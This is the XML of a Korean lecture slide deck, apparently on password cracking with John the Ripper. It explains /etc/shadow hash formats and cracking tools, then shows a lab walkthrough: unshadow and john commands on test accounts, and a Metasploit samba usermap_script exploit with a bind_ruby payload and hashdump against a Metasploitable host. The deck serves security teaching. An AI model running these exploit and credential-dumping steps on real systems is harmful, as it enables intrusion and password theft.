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JtR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 도구 및 패스워드 크래킹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/>
              <a:t>사용자 계정별 비밀번호 할당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passwd test1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>656565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passwd test2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>707070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passwd test3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>qwer1234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passwd test4: q1w2e3r4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passwd test5: afaafa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/etc/shadow 파일 확인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test 계정 생성 확인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John the Ripper 사용 준비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JtR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 사용기록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rm /root/.john/john.pot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Kali linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>passwd,shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 파일 내용을 저장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unshadow /etc/passwd /etc/shadow &gt; /tmp/password.txt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JtR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 도구의 버전과 플래그 종류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john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john --list=formats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JtR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>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요약본 해독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john --format=crypt /tmp/password.txt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플래그</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>(--format=crypt)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 생략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password.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에서 해독된 내용 확인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john --show /tmp/password.txt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JtR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 도구가 처리한 결과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cat /root/.john/john.pot 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JtR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>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공격대상</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 메타스플로이터블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 모듈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usermap_script.rb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osvdb-34700/cve-2004-2687</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 취약점을 활용한 모듈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삼바에서 발생한 구조적 속성을 악용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유닉스/리눅스 기반 침투 이후 JtR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메타스플로이터블의 비밀번호 저장상태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cat /etc/shadow | egrep “root”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usermap_script.rb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>모듈을 이용한 침투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use exploit/multi/samba/usermap_script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payload cmd/unix/bind_ruby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rhost 192.168.10.204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exitonsession false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exploit -j -z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유닉스/리눅스 기반 침투 이후 JtR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Enter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 입력 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>sessions -l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 을 입력하여 세션 연결 확인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hashdump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>모듈 사용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use post/linux/gather/hashdump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 session 1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exploit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요약 함수 덤프 결과를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/tmp/password.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 파일에 저장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유닉스/리눅스 기반 침투 이후 JtR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password.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 파일의 내용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cat /tmp/password.txt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JtR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>도구 사용 및 내용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john /tmp/password.txt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john --show /tmp/password.txt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유닉스/리눅스 기반 침투 이후 JtR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DBMS 서버 확인 도구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패스워드 크래킹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리눅스 기초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John the Ripper(JtR)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 도구 사용 준비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JtR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>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유닉스</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>리눅스 기반 침투 이후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>JtR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>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mssql_ping.rb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>모듈을 이용해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>MS-SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>존재 여부 확인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DBMS 서버 확인 도구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해당 시스템에 저장된 패스워드를 알아내는 해킹 기법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목적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컴퓨터 시스템에 무단 접근을 통해 권한을 획득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잊어버린 암호를 복구하기 위해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해킹 기법 중 난이도는 낮지만 가장 강력한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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>(Password Cracking)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8128" y="1788547"/>
            <a:ext cx="4799855" cy="3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2100" b="1"/>
              <a:t>존 더 리퍼(John the ripper) : 패스워드 크래킹 툴의 대표적인 툴</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2100" b="1"/>
              <a:t>이며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2100" b="1"/>
              <a:t>, 패스워드 크래킹의 대</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2100" b="1"/>
              <a:t>부</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2100" b="1"/>
              <a:t>분의 기법들이 포함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Ophcracker : 레인보우 테이블을 통한 크래킹 툴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카인과 아벨(Cain &amp; Abel) : 윈도우 GUI 기반 도구로 스니핑(Sniffing)과 ARP 포이스닝(Posisoning), 중간자 공격(MITM)에 주로 사용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히드라(Hydra) : 네트워크 패스워드 크래킹 툴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메두사(Medusa) : 히드라와 유사한 툴로 히드라에 비해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2100"/>
              <a:t>속도가 빠름</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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에어크랙(Aircrack) : 무선 네트워크의 패스워드를 크래킹하는 툴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 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유닉스 패스워드 크랙 도구이고 무료이며 오픈소스 소프트웨어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유료 버전은 John the ripper pro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알파벳 숫자의 조합, 숫자 조합, 단어 조합 등을 이용하여 무차별 대입 공격을 통해 패스워드를 크래킹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Windows에서는 Hash Swite, Android에서는 Hash Suite Droid라는 이름 사용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John the ripper(JtR)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Username : 로그인 이름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Password : 암호화된 패스워드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 암호화 방식에 대한 정보를 포함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$1$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> MD5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$2a$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> Blowfish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$2y$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> Blowfish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$5$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> SHA-256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$6$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> SHA-512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/etc/shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 파일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44" y="4814909"/>
            <a:ext cx="8479085" cy="1422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Last password change (lastchanged) : 1970년 1월 1일 이후의 비밀번호가 마지막으로 변경된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>일수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>(day)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Minimum : 비밀번호 변경 사이에 필요한 최소 일수, 즉 사용자가 비밀번호를 변경할 수 있는 남은 일수</a:t>
            </a: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Maximum : 비밀번호가 유효한 최대 일수(사용자가 비밀번호를 강제 변경한 후)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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Warn :  암호가 만료되기 전에 사용자에게 암호 변경 경고를 표시하는 일 수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/etc/shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 파일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44" y="4814909"/>
            <a:ext cx="8479085" cy="1422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/>
              <a:t>크랙에 이용할 사용자 계정 5개를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useradd test1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useradd test2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useradd test3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useradd test4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useradd test5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John the Ripper 사용 준비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430</ep:Words>
  <ep:PresentationFormat>와이드스크린</ep:PresentationFormat>
  <ep:Paragraphs>119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5. JtR 도구 및 패스워드 크래킹</vt:lpstr>
      <vt:lpstr>목차</vt:lpstr>
      <vt:lpstr>DBMS 서버 확인 도구</vt:lpstr>
      <vt:lpstr>패스워드 크래킹(Password Cracking)</vt:lpstr>
      <vt:lpstr>패스워드 크래킹 툴</vt:lpstr>
      <vt:lpstr>John the ripper(JtR)</vt:lpstr>
      <vt:lpstr>/etc/shadow 파일</vt:lpstr>
      <vt:lpstr>슬라이드 8</vt:lpstr>
      <vt:lpstr>John the Ripper 사용 준비</vt:lpstr>
      <vt:lpstr>John the Ripper 사용 준비</vt:lpstr>
      <vt:lpstr>JtR 사용</vt:lpstr>
      <vt:lpstr>JtR 사용</vt:lpstr>
      <vt:lpstr>유닉스/리눅스 기반 침투 이후 JtR 사용</vt:lpstr>
      <vt:lpstr>유닉스/리눅스 기반 침투 이후 JtR 사용</vt:lpstr>
      <vt:lpstr>유닉스/리눅스 기반 침투 이후 JtR 사용</vt:lpstr>
      <vt:lpstr>유닉스/리눅스 기반 침투 이후 JtR 사용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2021-12-27T14:37:28.987</dcterms:modified>
  <cp:revision>355</cp:revision>
  <dc:title>PowerPoint 프레젠테이션</dc:title>
  <cp:version/>
</cp:coreProperties>
</file>